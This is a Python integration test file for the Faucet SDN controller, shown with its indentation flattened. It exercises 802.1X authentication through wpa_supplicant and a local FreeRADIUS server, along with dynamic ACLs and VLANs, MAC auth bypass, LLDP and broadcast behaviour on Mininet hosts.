from_nfv_actions = [
'SET_FIELD: {eth_src:01:80:c2:00:00:03}', 'OUTPUT:%d' % port_no]
from_nfv_match = {
'in_port': self.nfv_portno, 'dl_src': self._priv_mac(port_no), 'dl_type': 0x888e}
self.wait_until_matching_flow(None, table_id=0, actions=port_actions)
self.wait_until_matching_flow(from_nfv_match, table_id=0, actions=from_nfv_actions)
def wait_8021x_success_flows(self, host, port_no):
from_host_actions = [
'GOTO_TABLE:1']
from_host_match = {
'in_port': port_no, 'dl_src': host.MAC()}
self.wait_until_matching_flow(from_host_match, table_id=0, actions=from_host_actions)
def verify_host_success(self, eapol_host, port_no, wpasupplicant_conf, and_logoff):
self.one_ipv4_ping(
eapol_host, self.ping_host.IP(), require_host_learned=False, expected_result=False)
self.assertTrue(
self.try_8021x(
eapol_host, port_no, wpasupplicant_conf, and_logoff=and_logoff))
self.one_ipv4_ping(
self.eapol1_host, self.ping_host.IP(), require_host_learned=False, expected_result=True)
def wpa_supplicant_callback(self, host, port_num, conf, and_logoff, timeout=10, terminate_wpasupplicant=False):
wpa_ctrl_path = self.get_wpa_ctrl_path(host)
if os.path.exists(wpa_ctrl_path):
self.terminate_wpasupplicant(host)
for pid in host.cmd('lsof -t %s' % wpa_ctrl_path).splitlines():
try:
os.kill(int(pid), 15)
except (ValueError, ProcessLookupError):
pass
try:
shutil.rmtree(wpa_ctrl_path)
except FileNotFoundError:
pass
log_prefix = host.name + '_'
self.start_wpasupplicant(
host, conf, timeout=timeout,
wpa_ctrl_socket_path=wpa_ctrl_path, log_prefix=log_prefix)
if and_logoff:
self.wait_for_eap_success(host, wpa_ctrl_path)
self.wait_until_matching_flow(
{'eth_src': host.MAC(), 'in_port': port_num}, table_id=0)
self.one_ipv4_ping(
host, self.ping_host.IP(), require_host_learned=False)
host.cmd('wpa_cli -p %s logoff' % wpa_ctrl_path)
self.wait_until_no_matching_flow(
{'eth_src': host.MAC(), 'in_port': port_num}, table_id=0)
self.one_ipv4_ping(
host, self.ping_host.IP(),
require_host_learned=False, expected_result=False)
if terminate_wpasupplicant:
self.terminate_wpasupplicant(host)
def terminate_wpasupplicant(self, host):
wpa_ctrl_path = self.get_wpa_ctrl_path(host)
host.cmd('wpa_cli -p %s terminate' % wpa_ctrl_path)
def get_wpa_ctrl_path(self, host):
wpa_ctrl_path = os.path.join(
self.tmpdir, '%s/%s-wpasupplicant' % (self.tmpdir, host.name))
return wpa_ctrl_path
@staticmethod
def get_wpa_status(host, wpa_ctrl_path):
status = host.cmdPrint('wpa_cli -p %s status' % wpa_ctrl_path)
for line in status.splitlines():
if line.startswith('EAP state'):
return line.split('=')[1].strip()
return None
def wait_for_eap_success(self, host, wpa_ctrl_path, timeout=5):
for _ in range(timeout):
eap_state = self.get_wpa_status(host, wpa_ctrl_path)
if eap_state == 'SUCCESS':
return
time.sleep(1)
self.fail('did not get EAP success: %s' % eap_state)
def wait_for_radius(self, radius_log_path):
self.wait_until_matching_lines_from_file(
r'.*Ready to process requests', radius_log_path)
def start_freeradius(self):
radius_log_path = '%s/radius.log' % self.tmpdir
listen_match = r'(listen {[^}]*(limit {[^}]*})[^}]*})|(listen {[^}]*})'
listen_config = """listen {
type = auth
ipaddr = *
port = %s
}
listen {
type = acct
ipaddr = *
port = %d
}""" % (self.RADIUS_PORT, self.RADIUS_PORT + 1)
if os.path.isfile('/etc/freeradius/users'):
# Assume we are dealing with freeradius 2 configuration
shutil.copytree('/etc/freeradius/', '%s/freeradius' % self.tmpdir)
users_path = '%s/freeradius/users' % self.tmpdir
with open('%s/freeradius/radiusd.conf' % self.tmpdir, 'r+') as default_site:
default_config = default_site.read()
default_config = re.sub(listen_match, '', default_config)
default_site.seek(0)
default_site.write(default_config)
default_site.write(listen_config)
default_site.truncate()
else:
# Assume we are dealing with freeradius >=3 configuration
freerad_version = os.popen(
                r'freeradius -v | egrep -o -m 1 "Version ([0-9]\.[0-9])"').read().rstrip()
freerad_major_version = freerad_version.split(' ')[1]
shutil.copytree('/etc/freeradius/%s/' % freerad_major_version,
'%s/freeradius' % self.tmpdir)
users_path = '%s/freeradius/mods-config/files/authorize' % self.tmpdir
with open('%s/freeradius/sites-enabled/default' % self.tmpdir, 'r+') as default_site:
default_config = default_site.read()
default_config = re.sub(
listen_match, '', default_config)
default_config = re.sub(
r'server default {', 'server default {\n' + listen_config, default_config)
default_site.seek(0)
default_site.write(default_config)
default_site.truncate()
with open(users_path, 'w') as users_file:
users_file.write(self.freeradius_user_conf.format(self.SESSION_TIMEOUT))
with open('%s/freeradius/clients.conf' % self.tmpdir, 'w') as clients:
clients.write("""client localhost {
ipaddr = 127.0.0.1
secret = SECRET
}""")
with open('%s/freeradius/sites-enabled/inner-tunnel' % self.tmpdir, 'r+') as innertunnel_site:
tunnel_config = innertunnel_site.read()
listen_config = """listen {
ipaddr = 127.0.0.1
port = %d
type = auth
}""" % (self.RADIUS_PORT + 2)
tunnel_config = re.sub(listen_match, listen_config, tunnel_config)
innertunnel_site.seek(0)
innertunnel_site.write(tunnel_config)
innertunnel_site.truncate()
os.system('chmod o+rx %s' % self.root_tmpdir)
os.system('chown -R root:freerad %s/freeradius/' % self.tmpdir)
self.nfv_host.cmd(
mininet_test_util.timeout_cmd(
'freeradius -X -l %s -d %s/freeradius &' % (radius_log_path, self.tmpdir),
300))
self.wait_for_radius(radius_log_path)
return radius_log_path
class Faucet8021XSuccessTest(Faucet8021XBase):
DOT1X_EXPECTED_EVENTS = [
{'ENABLED': {}},
{'PORT_UP': {'port': 'port_1', 'port_type': 'supplicant'}},
{'PORT_UP': {'port': 'port_2', 'port_type': 'supplicant'}},
{'PORT_UP': {'port': 'port_4', 'port_type': 'nfv'}},
{'AUTHENTICATION': {'port': 'port_1', 'eth_src': 'HOST1_MAC', 'status': 'success'}},
{'AUTHENTICATION': {'port': 'port_2', 'eth_src': 'HOST2_MAC', 'status': 'success'}},
{'AUTHENTICATION': {'port': 'port_2', 'eth_src': 'HOST2_MAC', 'status': 'logoff'}}]
SESSION_TIMEOUT = 3600
def test_untagged(self):
self.verify_host_success(
self.eapol1_host, self.port_map['port_1'], self.wpasupplicant_conf_1, False)
self.verify_host_success(
self.eapol2_host, self.port_map['port_2'], self.wpasupplicant_conf_1, True)
self.post_test_checks()
class Faucet8021XFailureTest(Faucet8021XBase):
"""Failure due to incorrect identity/password"""
wpasupplicant_conf_1 = """
ap_scan=0
network={
key_mgmt=IEEE8021X
eap=MD5
identity="user"
password="wrongpassword"
}
"""
DOT1X_EXPECTED_EVENTS = [
{'ENABLED': {}},
{'PORT_UP': {'port': 'port_1', 'port_type': 'supplicant'}},
{'PORT_UP': {'port': 'port_2', 'port_type': 'supplicant'}},
{'PORT_UP': {'port': 'port_4', 'port_type': 'nfv'}},
{'AUTHENTICATION': {'port': 'port_1', 'eth_src': 'HOST1_MAC', 'status': 'failure'}}]
def test_untagged(self):
self.assertFalse(
self.try_8021x(
self.eapol1_host, self.port_map['port_1'],
self.wpasupplicant_conf_1, and_logoff=False,
expect_success=False))
self.post_test_checks()
class Faucet8021XPortStatusTest(Faucet8021XBase):
DOT1X_EXPECTED_EVENTS = [
{'ENABLED': {}},
{'PORT_UP': {'port': 'port_1', 'port_type': 'supplicant'}},
{'PORT_UP': {'port': 'port_2', 'port_type': 'supplicant'}},
{'PORT_UP': {'port': 'port_4', 'port_type': 'nfv'}},
{'PORT_DOWN': {'port': 'port_1', 'port_type': 'supplicant'}},
{'PORT_UP': {'port': 'port_1', 'port_type': 'supplicant'}},
{'PORT_UP': {'port': 'port_4', 'port_type': 'nfv'}},
{'PORT_DOWN': {'port': 'port_1', 'port_type': 'supplicant'}},
{'PORT_UP': {'port': 'port_4', 'port_type': 'nfv'}},
{'PORT_UP': {'port': 'port_1', 'port_type': 'supplicant'}},
{'AUTHENTICATION': {'port': 'port_1', 'eth_src': 'HOST1_MAC', 'status': 'success'}},
{'PORT_DOWN': {'port': 'port_1', 'port_type': 'supplicant'}},
{'PORT_UP': {'port': 'port_1', 'port_type': 'supplicant'}}]
def test_untagged(self):
port_no1 = self.port_map['port_1']
port_no2 = self.port_map['port_2']
port_no4 = self.port_map['port_4']
self.wait_8021x_flows(port_no1)
self.set_port_down(port_no1)
# self.wait_until_no_matching_flow(None, table_id=0, actions=actions)
self.set_port_up(port_no1)
self.wait_8021x_flows(port_no1)
self.set_port_down(port_no4)
# self.wait_until_no_matching_flow(match, table_id=0, actions=actions)
self.set_port_up(port_no4)
self.wait_8021x_flows(port_no1)
# check only have rules for port 2 installed, after the NFV port comes up
self.set_port_down(port_no1)
self.flap_port(port_no4)
self.wait_8021x_flows(port_no2)
# no portno1
self.set_port_up(port_no1)
self.wait_8021x_flows(port_no1)
# When the port goes down, and up the host should not be authenticated anymore.
self.assertTrue(self.retry_8021x(
self.eapol1_host, port_no1, self.wpasupplicant_conf_1, and_logoff=False))
self.one_ipv4_ping(self.eapol1_host, self.ping_host.IP(), require_host_learned=False)
# terminate so don't automatically reauthenticate when port goes back up.
self.terminate_wpasupplicant(self.eapol1_host)
self.flap_port(port_no1)
self.wait_8021x_flows(port_no1)
self.one_ipv4_ping(
self.eapol1_host, self.ping_host.IP(),
require_host_learned=False, expected_result=False)
self.post_test_checks()
class Faucet8021XPortFlapTest(Faucet8021XBase):
def test_untagged(self):
port_no1 = self.port_map['port_1']
for _ in range(2):
self.set_port_up(port_no1)
self.assertTrue(self.retry_8021x(
self.eapol1_host, port_no1, self.wpasupplicant_conf_1, and_logoff=True))
self.set_port_down(port_no1)
self.assertFalse(self.try_8021x(
self.eapol1_host, port_no1, self.wpasupplicant_conf_1, and_logoff=False, expect_success=False))
self.one_ipv4_ping(
self.eapol1_host, self.ping_host.IP(),
require_host_learned=False, expected_result=False)
wpa_status = self.get_wpa_status(
self.eapol1_host, self.get_wpa_ctrl_path(self.eapol1_host))
self.assertNotEqual('SUCCESS', wpa_status)
# Kill supplicant so cant reply to the port up identity request.
self.terminate_wpasupplicant(self.eapol1_host)
self.post_test_checks()
class Faucet8021XIdentityOnPortUpTest(Faucet8021XBase):
def test_untagged(self):
port_no1 = self.port_map['port_1']
# start wpa sup, logon, then send id request.
self.set_port_up(port_no1)
self.assertTrue(self.try_8021x(
self.eapol1_host, port_no1, self.wpasupplicant_conf_1, and_logoff=False))
self.set_port_down(port_no1)
self.one_ipv4_ping(
self.eapol1_host, self.ping_host.IP(),
require_host_learned=False, expected_result=False)
def port_up(port):
self.set_port_up(port)
self.wait_8021x_flows(port)
username = 'user'
username_bytes = ''.join(('%2x' % ord(c) for c in username))
tcpdump_filter = ' or '.join((
self._success_eapol_filter(True),
self._eapol_filter(('ether[23:4] == 0x%s' % username_bytes,))))
tcpdump_txt = self.tcpdump_helper(
self.eapol1_host, tcpdump_filter, [
lambda: port_up(port_no1)],
timeout=30, vflags='-vvv', packets=2)
for req_str in (
'Identity: %s' % username, # supplicant replies with username
'Success', # supplicant success
):
self.assertTrue(req_str in tcpdump_txt, msg='%s not in %s' % (req_str, tcpdump_txt))
self.one_ipv4_ping(
self.eapol1_host, self.ping_host.IP(),
require_host_learned=False, expected_result=True, retries=10)
self.post_test_checks()
class Faucet8021XPeriodicReauthTest(Faucet8021XBase):
SESSION_TIMEOUT = 15
def test_untagged(self):
port_no1 = self.port_map['port_1']
port_labels1 = self.port_labels(port_no1)
self.set_port_up(port_no1)
self.assertTrue(self.try_8021x(
self.eapol1_host, port_no1, self.wpasupplicant_conf_1, and_logoff=False))
last_total = self.scrape_prometheus_var(
'port_dot1x_success_total', labels=port_labels1, default=0)
for _ in range(4):
for _ in range(self.SESSION_TIMEOUT * 2):
total = self.scrape_prometheus_var(
'port_dot1x_success_total', labels=port_labels1, default=0)
if total > last_total:
break
time.sleep(1)
self.assertGreater(total, last_total, msg='failed to successfully re-auth')
last_total = total
self.post_test_checks()
class Faucet8021XConfigReloadTest(Faucet8021XBase):
def test_untagged(self):
port_no1 = self.port_map['port_1']
port_no2 = self.port_map['port_2']
self.wait_8021x_flows(port_no1)
self.wait_8021x_flows(port_no2)
conf = self._get_faucet_conf()
conf['dps'][self.DP_NAME]['interfaces'][port_no1]['dot1x'] = False
self.reload_conf(
conf, self.faucet_config_path,
restart=True, cold_start=False, change_expected=True)
self.wait_8021x_flows(port_no2)
self.post_test_checks()
class Faucet8021XCustomACLLoginTest(Faucet8021XBase):
"""Ensure that 8021X Port ACLs Work before and after Login"""
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
acls:
auth_acl:
- rule:
dl_type: 0x800 # Allow ICMP / IPv4
ip_proto: 1
actions:
allow: True
- rule:
dl_type: 0x0806 # ARP Packets
actions:
allow: True
noauth_acl:
- rule:
dl_type: 0x800 # Deny ICMP / IPv4
ip_proto: 1
actions:
allow: False
- rule:
dl_type: 0x0806 # ARP Packets
actions:
allow: True
"""
CONFIG = """
dot1x:
nfv_intf: NFV_INTF
nfv_sw_port: %(port_4)d
radius_ip: 127.0.0.1
radius_port: RADIUS_PORT
radius_secret: SECRET
auth_acl: auth_acl
noauth_acl: noauth_acl
interfaces:
%(port_1)d:
name: b1
description: "b1"
native_vlan: 100
# 802.1x client.
dot1x: True
dot1x_acl: True
%(port_2)d:
name: b2
description: "b2"
native_vlan: 100
# 802.1X client.
dot1x: True
dot1x_acl: True
%(port_3)d:
name: b3
description: "b3"
native_vlan: 100
# ping host.
%(port_4)d:
name: b4
description: "b4"
output_only: True
# "NFV host - interface used by controller."
"""
def test_untagged(self):
self.verify_host_success(
self.eapol1_host, self.port_map['port_1'], self.wpasupplicant_conf_1, False)
self.post_test_checks()
class Faucet8021XCustomACLLogoutTest(Faucet8021XCustomACLLoginTest):
"""Ensure that 8021X Port ACLs Work before and after Logout"""
def test_untagged(self):
self.one_ipv4_ping(self.eapol1_host, self.ping_host.IP(),
require_host_learned=False, expected_result=False)
self.assertTrue(self.try_8021x(
self.eapol1_host, self.port_map['port_1'], self.wpasupplicant_conf_1, and_logoff=True))
self.one_ipv4_ping(self.eapol1_host, self.ping_host.IP(),
require_host_learned=False, expected_result=False)
self.post_test_checks()
class Faucet8021XMABTest(Faucet8021XSuccessTest):
"""Ensure that 802.1x Port Supports Mac Auth Bypass."""
DOT1X_EXPECTED_EVENTS = [{'ENABLED': {}},
{'PORT_UP': {'port': 'port_1', 'port_type': 'supplicant'}},
{'PORT_UP': {'port': 'port_2', 'port_type': 'supplicant'}},
{'PORT_UP': {'port': 'port_4', 'port_type': 'nfv'}},
{'AUTHENTICATION': {'port': 'port_1', 'eth_src': 'HOST1_MAC',
'status': 'success'}},
]
CONFIG = """
dot1x:
nfv_intf: NFV_INTF
nfv_sw_port: %(port_4)d
radius_ip: 127.0.0.1
radius_port: RADIUS_PORT
radius_secret: SECRET
interfaces:
%(port_1)d:
native_vlan: 100
# 802.1x client.
dot1x: True
dot1x_mab: True
%(port_2)d:
native_vlan: 100
# 802.1X client.
dot1x: True
%(port_3)d:
native_vlan: 100
# ping host.
%(port_4)d:
output_only: True
# "NFV host - interface used by controller."
"""
def start_freeradius(self):
# Add the host mac address to the FreeRADIUS config
self.freeradius_user_conf += '\n{0} Cleartext-Password := "{0}"'.format(
str(self.eapol1_host.MAC()).replace(':', '')
)
return super().start_freeradius()
def test_untagged(self):
port_no1 = self.port_map['port_1']
self.one_ipv4_ping(
self.eapol1_host, self.ping_host.IP(),
require_host_learned=False, expected_result=False)
self.eapol1_host.run_dhclient(self.tmpdir)
self.wait_until_matching_lines_from_faucet_log_files(r'.*AAA_SUCCESS.*')
self.one_ipv4_ping(
self.eapol1_host, self.ping_host.IP(),
require_host_learned=False, expected_result=True)
self.assertEqual(
1,
self.scrape_prometheus_var('port_dot1x_success_total', labels=self.port_labels(port_no1), default=0))
self.post_test_checks()
class Faucet8021XDynACLLoginTest(Faucet8021XCustomACLLoginTest):
"""Ensure that 8021X Port ACLs Work before and after Logout"""
DOT1X_EXPECTED_EVENTS = [
{'ENABLED': {}},
{'PORT_UP': {'port': 'port_1', 'port_type': 'supplicant'}},
{'PORT_UP': {'port': 'port_2', 'port_type': 'supplicant'}},
{'PORT_UP': {'port': 'port_4', 'port_type': 'nfv'}},
{'AUTHENTICATION': {'port': 'port_1', 'eth_src': 'HOST1_MAC', 'status': 'success'}},
{'AUTHENTICATION': {'port': 'port_2', 'eth_src': 'HOST2_MAC', 'status': 'success'}},
]
wpasupplicant_conf_1 = """
ap_scan=0
network={
key_mgmt=IEEE8021X
eap=MD5
identity="filter_id_user_accept"
password="accept_pass"
}
"""
wpasupplicant_conf_2 = """
ap_scan=0
network={
key_mgmt=IEEE8021X
eap=MD5
identity="filter_id_user_deny"
password="deny_pass"
}
"""
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
acls:
accept_acl:
dot1x_assigned: True
rules:
- rule:
dl_type: 0x800 # Allow ICMP / IPv4
ip_proto: 1
actions:
allow: True
- rule:
dl_type: 0x0806 # ARP Packets
actions:
allow: True
deny_acl:
dot1x_assigned: True
rules:
- rule:
dl_type: 0x800 # Deny ICMP / IPv4
ip_proto: 1
actions:
allow: False
- rule:
dl_type: 0x0806 # ARP Packets
actions:
allow: True
"""
CONFIG = """
dot1x:
nfv_intf: NFV_INTF
nfv_sw_port: %(port_4)d
radius_ip: 127.0.0.1
radius_port: RADIUS_PORT
radius_secret: SECRET
interfaces:
%(port_1)d:
name: b1
description: "b1"
native_vlan: 100
# 802.1x client.
dot1x: True
dot1x_dyn_acl: True
%(port_2)d:
name: b2
description: "b2"
native_vlan: 100
# 802.1X client.
dot1x: True
dot1x_dyn_acl: True
%(port_3)d:
name: b3
description: "b3"
native_vlan: 100
# ping host.
%(port_4)d:
name: b4
description: "b4"
output_only: True
# "NFV host - interface used by controller."
"""
def test_untagged(self):
port_no1 = self.port_map['port_1']
port_no2 = self.port_map['port_2']
self.one_ipv4_ping(self.eapol1_host, self.ping_host.IP(),
require_host_learned=False, expected_result=False)
self.one_ipv4_ping(self.eapol2_host, self.ping_host.IP(),
require_host_learned=False, expected_result=False)
self.assertTrue(self.try_8021x(
self.eapol1_host, port_no1, self.wpasupplicant_conf_1, and_logoff=False))
self.assertTrue(self.try_8021x(
self.eapol2_host, port_no2, self.wpasupplicant_conf_2, and_logoff=False))
self.one_ipv4_ping(self.eapol1_host, self.ping_host.IP(),
require_host_learned=False, expected_result=True)
self.one_ipv4_ping(self.eapol2_host, self.ping_host.IP(),
require_host_learned=False, expected_result=False)
self.post_test_checks()
class Faucet8021XDynACLLogoutTest(Faucet8021XDynACLLoginTest):
DOT1X_EXPECTED_EVENTS = [
{'ENABLED': {}},
{'PORT_UP': {'port': 'port_1', 'port_type': 'supplicant'}},
{'PORT_UP': {'port': 'port_4', 'port_type': 'nfv'}},
{'AUTHENTICATION': {'port': 'port_1', 'eth_src': 'HOST1_MAC', 'status': 'success'}},
{'AUTHENTICATION': {'port': 'port_1', 'eth_src': 'HOST1_MAC', 'status': 'logoff'}}
]
def test_untagged(self):
port_no1 = self.port_map['port_1']
self.one_ipv4_ping(self.eapol1_host, self.ping_host.IP(),
require_host_learned=False, expected_result=False)
self.assertTrue(self.try_8021x(
self.eapol1_host, port_no1, self.wpasupplicant_conf_1, and_logoff=True))
self.one_ipv4_ping(self.eapol1_host, self.ping_host.IP(),
require_host_learned=False, expected_result=False)
self.post_test_checks()
class Faucet8021XVLANTest(Faucet8021XSuccessTest):
"""Test that two hosts are put into vlans.
Same VLAN, Logoff, diff VLANs, port flap."""
CONFIG_GLOBAL = """vlans:
100:
vid: 100
description: "untagged"
radiusassignedvlan1:
vid: %u
description: "untagged"
dot1x_assigned: True
radiusassignedvlan2:
vid: %u
description: "untagged"
dot1x_assigned: True
""" % (mininet_test_base.MAX_TEST_VID - 1,
mininet_test_base.MAX_TEST_VID)
CONFIG = """
dot1x:
nfv_intf: NFV_INTF
nfv_sw_port: %(port_4)d
radius_ip: 127.0.0.1
radius_port: RADIUS_PORT
radius_secret: SECRET
interfaces:
%(port_1)d:
native_vlan: 100
# 802.1x client.
dot1x: True
%(port_2)d:
native_vlan: 100
# 802.1X client.
dot1x: True
%(port_3)d:
native_vlan: radiusassignedvlan1
# ping host.
%(port_4)d:
output_only: True
# "NFV host - interface used by controller."
"""
RADIUS_PORT = 1940
DOT1X_EXPECTED_EVENTS = []
wpasupplicant_conf_1 = """
ap_scan=0
network={
key_mgmt=IEEE8021X
eap=MD5
identity="vlanuser1001"
password="password"
}
"""
wpasupplicant_conf_2 = """
ap_scan=0
network={
key_mgmt=IEEE8021X
eap=MD5
identity="vlanuser2222"
password="milliphone"
}
"""
def test_untagged(self):
vid = 100 ^ mininet_test_base.OFPVID_PRESENT
radius_vid1 = (mininet_test_base.MAX_TEST_VID - 1) ^ mininet_test_base.OFPVID_PRESENT
radius_vid2 = mininet_test_base.MAX_TEST_VID ^ mininet_test_base.OFPVID_PRESENT
port_no1 = self.port_map['port_1']
port_no2 = self.port_map['port_2']
port_no3 = self.port_map['port_3']
self.assertTrue(self.try_8021x(
self.eapol1_host, port_no1, self.wpasupplicant_conf_1, and_logoff=False))
self.wait_until_matching_flow(
{'in_port': port_no1},
table_id=self._VLAN_TABLE,
actions=['SET_FIELD: {vlan_vid:%u}' % radius_vid1])
self.wait_until_matching_flow(
{'vlan_vid': radius_vid1},
table_id=self._FLOOD_TABLE,
actions=['POP_VLAN', 'OUTPUT:%s' % port_no1, 'OUTPUT:%s' % port_no3])
self.wait_until_matching_flow(
{'vlan_vid': vid},
table_id=self._FLOOD_TABLE,
actions=['POP_VLAN', 'OUTPUT:%s' % port_no2])
self.wait_until_no_matching_flow(
{'vlan_vid': radius_vid2},
table_id=self._FLOOD_TABLE,
actions=['POP_VLAN', 'OUTPUT:%s' % port_no1, 'OUTPUT:%s' % port_no2])
self.one_ipv4_ping(
self.eapol1_host, self.ping_host.IP(),
require_host_learned=False, expected_result=True)
self.assertTrue(self.try_8021x(
self.eapol1_host, port_no1, self.wpasupplicant_conf_1, and_logoff=True))
self.one_ipv4_ping(
self.eapol1_host, self.ping_host.IP(),
require_host_learned=False, expected_result=False)
# check ports are back in the right vlans.
self.wait_until_no_matching_flow(
{'in_port': port_no1},
table_id=self._VLAN_TABLE,
actions=['SET_FIELD: {vlan_vid:%u}' % radius_vid1])
self.wait_until_matching_flow(
{'in_port': port_no1},
table_id=self._VLAN_TABLE,
actions=['SET_FIELD: {vlan_vid:%u}' % vid])
# check flood ports are in the right vlans
self.wait_until_no_matching_flow(
{'vlan_vid': radius_vid1},
table_id=self._FLOOD_TABLE,
actions=['POP_VLAN', 'OUTPUT:%s' % port_no1, 'OUTPUT:%s' % port_no3])
self.wait_until_matching_flow(
{'vlan_vid': vid},
table_id=self._FLOOD_TABLE,
actions=['POP_VLAN', 'OUTPUT:%s' % port_no1, 'OUTPUT:%s' % port_no2])
# check two 1x hosts play nicely. (same dyn vlan)
self.assertTrue(self.try_8021x(
self.eapol1_host, port_no1, self.wpasupplicant_conf_1, and_logoff=False))
self.one_ipv4_ping(
self.eapol1_host, self.ping_host.IP(),
require_host_learned=False, expected_result=True)
self.one_ipv4_ping(
self.eapol1_host, self.eapol2_host.IP(),
require_host_learned=False, expected_result=False)
self.assertTrue(self.try_8021x(
self.eapol2_host, port_no2, self.wpasupplicant_conf_1, and_logoff=False))
self.one_ipv4_ping(
self.eapol2_host, self.ping_host.IP(),
require_host_learned=False, expected_result=True)
self.one_ipv4_ping(
self.eapol2_host, self.eapol1_host.IP(),
require_host_learned=False, expected_result=True)
# check two 1x hosts dont play (diff dyn vlan).
self.assertTrue(self.try_8021x(
self.eapol2_host, port_no2, self.wpasupplicant_conf_2, and_logoff=False))
self.one_ipv4_ping(
self.eapol2_host, self.ping_host.IP(),
require_host_learned=False, expected_result=False)
self.one_ipv4_ping(
self.eapol2_host, self.eapol1_host.IP(),
require_host_learned=False, expected_result=False)
# move host1 to new VLAN
self.assertTrue(self.try_8021x(
self.eapol1_host, port_no1, self.wpasupplicant_conf_2, and_logoff=False))
self.one_ipv4_ping(
self.eapol1_host, self.ping_host.IP(),
require_host_learned=False, expected_result=False)
self.one_ipv4_ping(
self.eapol1_host, self.eapol2_host.IP(),
require_host_learned=False, expected_result=True)
self.wait_until_matching_flow(
{'eth_src': self.eapol1_host.MAC(), 'vlan_vid': radius_vid2},
table_id=self._ETH_SRC_TABLE)
self.wait_until_matching_flow(
{'eth_src': self.eapol1_host.MAC(), 'vlan_vid': radius_vid2},
table_id=self._ETH_SRC_TABLE)
self.wait_until_no_matching_flow(
{'eth_src': self.eapol1_host.MAC(), 'vlan_vid': vid},
table_id=self._ETH_SRC_TABLE)
self.wait_until_no_matching_flow(
{'eth_src': self.eapol1_host.MAC(), 'vlan_vid': radius_vid1},
table_id=self._ETH_SRC_TABLE)
self.wait_until_no_matching_flow(
{'eth_dst': self.eapol1_host.MAC(), 'vlan_vid': vid},
table_id=self._ETH_DST_TABLE)
self.wait_until_no_matching_flow(
{'eth_dst': self.eapol1_host.MAC(), 'vlan_vid': radius_vid1},
table_id=self._ETH_DST_TABLE)
# test port up/down. removes the dynamic vlan & host cache.
self.flap_port(port_no2)
self.wait_until_matching_flow(
{'in_port': port_no2},
table_id=self._VLAN_TABLE,
actions=['SET_FIELD: {vlan_vid:%u}' % vid])
self.wait_until_matching_flow(
{'vlan_vid': vid},
table_id=self._FLOOD_TABLE,
actions=['POP_VLAN', 'OUTPUT:%s' % port_no2])
self.wait_until_no_matching_flow(
{'in_port': port_no2},
table_id=self._VLAN_TABLE,
actions=['SET_FIELD: {vlan_vid:%u}' % radius_vid2])
self.wait_until_no_matching_flow(
{'vlan_vid': radius_vid2},
table_id=self._FLOOD_TABLE,
actions=['POP_VLAN', 'OUTPUT:%s' % port_no1, 'OUTPUT:%s' % port_no2])
self.wait_until_no_matching_flow(
{'eth_src': self.eapol2_host.MAC()},
table_id=self._ETH_SRC_TABLE)
self.wait_until_no_matching_flow(
{'eth_dst': self.eapol2_host.MAC(), 'vlan_vid': radius_vid1},
table_id=self._ETH_DST_TABLE,
actions=['POP_VLAN', 'OUTPUT:%s' % port_no2])
self.post_test_checks()
class FaucetUntaggedRandomVidTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
randvlan:
vid: 100
description: "untagged"
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: randvlan
%(port_2)d:
native_vlan: randvlan
%(port_3)d:
native_vlan: randvlan
%(port_4)d:
native_vlan: randvlan
"""
def test_untagged(self):
last_vid = None
for _ in range(5):
vid = random.randint(2, mininet_test_base.MAX_TEST_VID)
if vid == last_vid:
continue
self.change_vlan_config(
'randvlan', 'vid', vid, cold_start=True, hup=True)
self.ping_all_when_learned()
last_vid = vid
class FaucetUntaggedNoCombinatorialFloodTest(FaucetUntaggedTest):
CONFIG = """
combinatorial_port_flood: False
""" + CONFIG_BOILER_UNTAGGED
class FaucetUntaggedControllerNfvTest(FaucetUntaggedTest):
def test_untagged(self):
# Name of switch interface connected to last host,
# accessible to controller
last_host = self.hosts_name_ordered()[-1]
switch = self.first_switch()
last_host_switch_link = switch.connectionsTo(last_host)[0]
last_host_switch_intf = [intf for intf in last_host_switch_link if intf in switch.intfList()][0]
super().test_untagged()
# Confirm controller can see switch interface with traffic.
ifconfig_output = self.net.controllers[0].cmd('ifconfig %s' % last_host_switch_intf)
self.assertTrue(
re.search('(R|T)X packets[: ][1-9]', ifconfig_output),
msg=ifconfig_output)
class FaucetUntaggedBroadcastTest(FaucetUntaggedTest):
def test_untagged(self):
super().test_untagged()
self.verify_broadcast()
self.verify_no_bcast_to_self()
self.verify_unicast_not_looped()
class FaucetUntaggedNSLoopTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
acls:
nsonly:
- rule:
dl_type: %u
ip_proto: 58
icmpv6_type: 135
actions:
allow: 1
- rule:
actions:
allow: 0
vlans:
100:
description: "untagged"
""" % IPV6_ETH
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
acl_in: nsonly
%(port_2)d:
native_vlan: 100
acl_in: nsonly
%(port_3)d:
native_vlan: 100
acl_in: nsonly
%(port_4)d:
native_vlan: 100
acl_in: nsonly
"""
def test_untagged(self):
self.verify_no_bcast_to_self()
class FaucetUntaggedNoCombinatorialBroadcastTest(FaucetUntaggedBroadcastTest):
CONFIG = """
combinatorial_port_flood: False
""" + CONFIG_BOILER_UNTAGGED
class FaucetUntaggedLogRotateTest(FaucetUntaggedTest):
def test_untagged(self):
faucet_log = self.env[self.faucet_controllers[0].name]['FAUCET_LOG']
self.assertTrue(os.path.exists(faucet_log))
os.rename(faucet_log, faucet_log + '.old')
self.assertTrue(os.path.exists(faucet_log + '.old'))
self.flap_all_switch_ports()
self.assertTrue(os.path.exists(faucet_log))
class FaucetUntaggedLLDPTest(FaucetUntaggedTest):
CONFIG = """
lldp_beacon:
send_interval: 5
max_per_interval: 5
interfaces:
%(port_1)d:
native_vlan: 100
lldp_beacon:
enable: True
system_name: "faucet"
port_descr: "first_port"
org_tlvs:
- {oui: 0x12bb, subtype: 2, info: "01406500"}
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
@staticmethod
def wireshark_payload_format(payload_str):
formatted_payload_str = ''
groupsize = 4
for payload_offset in range(len(payload_str) // groupsize):
char_count = payload_offset * 2
if char_count % 0x10 == 0:
formatted_payload_str += '0x%4.4x: ' % char_count
payload_fragment = payload_str[payload_offset * groupsize:][:groupsize]
formatted_payload_str += ' ' + payload_fragment
return formatted_payload_str
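    # For example, wireshark_payload_format('deadbeef') returns '0x0000:  dead beef';
    # a new '0xNNNN:' byte-offset marker is emitted every 16 bytes, as in Wireshark.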
def test_untagged(self):
first_host = self.hosts_name_ordered()[0]
